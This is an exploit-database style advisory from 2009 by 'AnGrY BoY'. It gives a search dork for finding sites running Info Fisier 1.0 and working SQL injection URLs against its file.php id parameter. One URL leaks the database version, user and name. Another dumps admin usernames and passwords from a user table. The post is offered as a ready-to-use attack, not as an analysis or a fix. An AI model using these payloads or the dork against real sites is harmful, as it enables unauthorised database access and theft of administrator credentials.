[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Info Fisier v1.0 SQL Injection Vulnerability
# Published : 2009-12-27
# Author : AnGrY BoY
# Previous Title : Nuke Remote SQL Injection Vulnerability
# Next Title : Smart PHP Uploader 1.0 Remote File Upload Vulnerability
====================================================================================
[+] Info Fisier 1.0 SQL Injection Vulnerability
[+] Software : Info Fisier 1.0
[+] Author : AnGrY BoY
[+] Contact : h4kurd@hotmail.com & h4kurd@yahoo.com
[+] Home : http://www.kurd-security.com http://www.h4kurd.com
=====================================================================================
[+] Dork : Powered by Info Fisier
[+] expolit:
[+] http://server/upload/file.php?id=[sql]
[+] http://server/upload/file.php?id=-54/**/union/**/select/**/1,concat(version(),0x3e,user(),0x3e,database()),3,4,5,6,7,8,9,10,11--
[+] http://server/file.php?id=-670/**/union/**/select/**/1,group_concat(admin,0x3e,pass),3,4,5,6,7,8,9,10,11/**/from+djsefu_useri--
======================================================================================
[+]Special Thanks:- Hangaw_hawlery & FormatXformaT and all kurd-security members